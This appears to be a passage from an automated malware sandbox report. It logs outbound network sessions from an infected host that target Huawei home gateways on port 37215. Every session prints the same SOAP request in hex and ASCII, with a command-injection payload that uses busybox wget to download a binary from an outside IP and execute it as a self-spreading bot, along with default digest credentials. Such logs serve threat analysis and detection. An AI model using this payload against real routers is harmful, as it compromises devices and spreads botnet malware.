                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  576192.168.2.1351622157.12.178.24137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.125520945 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  577192.168.2.136003623.80.52.18537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.127207994 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  578192.168.2.133870841.210.153.16237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.127218008 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  579192.168.2.1355954197.142.238.22337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.127258062 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  580192.168.2.1343986157.106.128.9237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.127392054 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  581192.168.2.133428241.179.62.12337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.127423048 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  582192.168.2.1341872157.168.44.5037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.127432108 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  583192.168.2.1343280197.132.203.15137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.127518892 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  584192.168.2.1342954197.216.103.16437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.127530098 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  585192.168.2.1351372197.77.84.10037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.127538919 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 